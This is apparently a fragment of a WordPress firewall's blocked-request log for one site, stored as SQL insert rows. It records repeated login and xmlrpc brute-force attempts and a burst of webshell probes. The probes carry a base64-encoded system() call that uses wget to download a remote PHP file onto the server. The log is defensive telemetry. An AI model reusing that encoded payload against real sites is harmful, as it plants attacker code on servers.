Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','JKkT1ysUB3nVPWcOqFLGm46E',0,1663974051.9779,436,'','POST',403,0,600,0,1,'',0),('121.42.231.47',2032854831,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','4x6SYh2XD0qFQNAoJjdmBUMZ',0,1663974503.3973,13912,'','POST',403,0,600,0,1,'',0),('162.240.28.177',2733644977,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','zbpRgiVoa9xLjBt12GnCNhsW',0,1663975553.5353,11552,'','POST',403,0,600,0,1,'',0),('213.152.162.165',3583550117,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iCEXe14MIKq9nBYDt2p8Tsmx',0,1663976233.4923,18756,'','POST',403,0,515,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','3yIY1paNhrM0QbltXnDV8mGo',0,1663976603.9956,1307,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','VJw4ajFvzHCST1xNcQ6yIibg',0,1663977660.6628,18052,'','POST',403,0,600,0,1,'',0),('213.152.161.85',3583549781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','izTj3NZr8hSBJE60Mm7IUWsu',0,1663977712.1054,1454,'','POST',403,0,515,0,1,'',0),('51.195.148.190',868455614,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','lV9WRPhZ4JQjMvxUo6AN2sYp',0,1663978716.5363,18111,'','POST',403,0,600,0,1,'',0),('167.172.105.95',2813094239,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','fVWhyFTSNquIeDbrEU2HiZ0g',0,1663979769.6112,18652,'','POST',403,0,600,0,1,'',0),('208.109.54.127',3496818303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','ljwrmzE69XN8TWA5B4yOsFIv',0,1663980821.1274,17231,'','POST',403,0,600,0,1,'',0),('137.184.117.52',2310567220,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','EN3o54OpFlTLSVPxC8DkYuIs',0,1663981870.4583,17689,'','POST',403,0,600,0,1,'',0),('167.71.117.225',2806478305,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','mHA5jZhsTnxUSfNFRt21i647',0,1663982926.1103,18379,'','POST',403,0,600,0,1,'',0),('185.195.237.203',3116625355,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fQUBvHkzeKT7R2o0Nhw1sO4G',0,1663983834.1202,4513,'','POST',403,0,515,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','Td1Ok67DizFeXMEsLJwxVvP2',0,1663983987.8489,7250,'','POST',403,0,600,0,1,'',0),('5.175.45.32',95366432,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','j0JazOWtnq5YPvoAgTymVl76',0,1663986797.1605,561,'','POST',403,0,600,0,1,'',0),('5.175.45.32',95366432,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','rUec3wXf1ujR5AGd6l8vWMKV',0,1663986798.5525,597,'','POST',403,0,600,0,1,'',0),('185.189.112.19',3116199955,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KrAkc1PRD76LpMQnxwJNsX0i',0,1663988126.1761,18576,'','POST',403,0,515,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','SsqQ1YVKARhb4mX6POgwjrFz',0,1663988278.9050,1224,'','POST',403,0,600,0,1,'',0),('118.24.106.172',1981311660,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','ijYCqTVlEwGm2BWR5UxLcPAa',0,1663989354.9365,18025,'','POST',403,0,600,0,1,'',0),('62.102.148.187',1046910139,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xXsrnjEmDZRS5MC2ugG8Tdak',0,1663989789.4641,2263,'','POST',403,0,515,0,1,'',0),('188.166.236.35',3165056035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','kUVhbSWHoreyNDRJ3Epqx98z',0,1663990433.0066,17469,'','POST',403,0,600,0,1,'',0),('209.141.46.253',3515690749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','51s7hS6dPOaYNyTZuBUDtn0p',0,1663991388.9606,6519,'','POST',403,0,600,0,1,'',0),('194.163.35.152',3265471384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','FRN7AzXEwrvQ3L8B4SVOKhxc',0,1663991508.8910,1274,'','POST',403,0,600,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','4xFvMEw2U7YRH6JjciaqkXGA',0,1663992570.8842,1466,'','POST',403,0,600,0,1,'',0),('95.213.194.189',1607844541,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','y8RSFsAvj6QPNguYiDeqMBW0',0,1663992729.8528,514,'','POST',403,0,600,0,1,'',0),('95.213.194.189',1607844541,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','NTJFHdOcLyqnYRGXkh6Us1le',0,1663992731.6061,491,'','POST',403,0,600,0,1,'',0),('82.202.174.35',1389014563,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','IyAaObnJjsZp9teBRQvoGYWz',0,1663993391.3456,504,'','POST',403,0,600,0,1,'',0),('82.202.174.35',1389014563,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','YS8Bmsob0cANLz5MyD4x3HQ2',0,1663993392.9475,534,'','POST',403,0,600,0,1,'',0),('194.163.35.152',3265471384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','Q80iv19YkexcUPuAzwThdNMp',0,1663993623.5753,8133,'','POST',403,0,600,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-stream.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=&lt=503c138bd956ccbe9a63967ef1f22dac','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','qWRi2nIs4zruml09FQ17dYgS',0,1663994473.8563,324,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-blog-post.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=&lt=503c138bd956ccbe9a63967ef1f22dac','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','3b7NnQP652JR8aO9hgMuvjfD',0,1663994476.3050,277,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-blockdown.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=&lt=503c138bd956ccbe9a63967ef1f22dac','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','htQDyg6vZUlAzHXIok73mGBs',0,1663994477.8116,286,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-beckup.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=&lt=503c138bd956ccbe9a63967ef1f22dac','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','SVa4tRz5DuWwn6gNbMTYj1pX',0,1663994478.9597,277,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com//wp-blockup.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=&lt=503c138bd956ccbe9a63967ef1f22dac','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','PK3pw54stGJ687XZIRHfLWCo',0,1663994480.7833,314,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-content/uploads/wp-blockup.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=&lt=503c138bd956ccbe9a63967ef1f22dac','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','61rvAmzthDfHWS3jB82XxLku',0,1663994483.1528,293,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-content/uploads/wp-stream.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=&lt=503c138bd956ccbe9a63967ef1f22dac','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','9QAMWu3blDjgrCfqmx1sO4vi',0,1663994484.4715,289,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-admin/css/colors/blue/blue.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','4lIQHDkbjygxdopCZLMa2v0h',0,1663994486.0726,288,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/slicemap.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','yr8LSD4eQEgRaVNXGfxdFbkj',0,1663994487.1656,277,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-content/uploads/wp-blockdown.php?a=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=&lt=503c138bd956ccbe9a63967ef1f22dac','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','O9ZSNTIAzygFGc4WpE3xUluJ',0,1663994493.7276,301,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-content/plugins/wp-sps/simple.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','asXu6HDbreNq8YnKyptQJz1f',0,1663994494.9633,302,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/assets/images/images.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','17ay9Zs6OPLj0G3TN24h5cok',0,1663994496.2058,300,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-admin/wp-admin.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','UPbgeJ4A3jCwNIuELYDiZfcB',0,1663994497.4025,311,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-content/wp-content.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','jibFaSGMT7vQucmsXqE4YzCy',0,1663994498.6902,315,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/nc_assets/img/featured/600/600.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','5OrYbadnu1vLwftFTj8V3KgA',0,1663994501.4001,289,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/cgi-bin/cgi-bin.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','lVgN1i4eGLMScOZfasDIXE0P',0,1663994502.6552,300,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-includes/wp-includes.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','vD5T3Hi6VO08LAntrNJYSpsg',0,1663994503.8793,290,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-slicemap.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','5xCotGQf1m80ZnS2KdwV9vur',0,1663994505.9657,290,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/blog/wp-admin/css/colors/blue/blue.php?wall=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','oODlPgjuTBGJr4xhEqdQ9fkU',0,1663994507.3667,282,'','GET',403,0,700,0,1,'',0),('103.133.214.139',1736824459,'','http://cteisys.com/wp-includes/SimplePie/SimplePie.php?ebd=c3lzdGVtKCd3Z2V0IGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9BS1lqanBkWSAtTyBuaW4ucGhwIDtlY2hvICJmYWlzYWxfMTMzNyInKTs=','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','69EGSpxazkn8bierWQRPwTVO',0,1663994508.5254,322,'','GET',403,0,700,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','KLBuEoaJZzXi57fVY8gGI6dF',0,1663994678.3202,1337,'','POST',403,0,600,0,1,'',0),('181.174.125.214',3048111574,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','xOD2Vy7hAH0UM9WStbJpPIms',0,1663995723.7356,17963,'','POST',403,0,600,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','oLQiWjZqBFPlm1n9zbJa8YEM',0,1663996513.1165,1562,'','POST',403,0,600,0,1,'',0),('93.84.114.152',1565815448,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','hPvLzGfS6AaFVYQquoEjwrnK',0,1663996577.2837,693,'','POST',403,0,600,0,1,'',0),('93.84.114.152',1565815448,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','ViJLlc4twyknTpCUoxF60jW3',0,1663996579.2358,595,'','POST',403,0,600,0,1,'',0),('124.106.71.219',2087339995,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','k56GicJXqe0oCshTIW2yFEm4',0,1663997774.8912,17937,'','POST',403,0,600,0,1,'',0),('168.119.80.254',2826391806,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','Bh5NuW32kUQw8fgrELCSJcMF',0,1663998763.1110,17559,'','POST',403,0,600,0,1,'',0),('23.88.110.165',391671461,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','V37h0qEcOB9LaMoIJF5xRX2C',0,1664000220.9414,537,'','POST',403,0,600,0,1,'',0),('23.88.110.165',391671461,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','xEOD4wzbvRJfnWqLycBQ6Yha',0,1664000222.5553,480,'','POST',403,0,600,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','TJGDVcBYioQ1XHMLmalv7Z3O',0,1664000792.0985,17862,'','POST',403,0,600,0,1,'',0),('43.225.100.101',736191589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','du8qXGpc9hoL1iKQDx7B3gzW',0,1664001275.0765,539,'','POST',403,0,600,0,1,'',0),('43.225.100.101',736191589,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','dh1KBYTyNzUoeJp9ZL8cFbk3',0,1664001276.4962,469,'','POST',403,0,600,0,1,'',0),('185.106.208.127',3110785151,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','p1QD27mRWfHcOCogS5XMk3J9',0,1664001308.2331,645,'','POST',403,0,600,0,1,'',0),('185.106.208.127',3110785151,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','BYEtS5gKlvHFCwjToVZiU9Ru',0,1664001310.1713,500,'','POST',403,0,600,0,1,'',0),('212.110.92.155',3564002459,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','F8cH4GvLTK6lIdzD9es0qfog',0,1664001824.2673,18417,'','POST',403,0,600,0,1,'',0),('45.55.44.23',758590487,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','wxtXSh4bzKyBOFr0luPijnG6',0,1664002855.5012,18220,'','POST',403,0,600,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 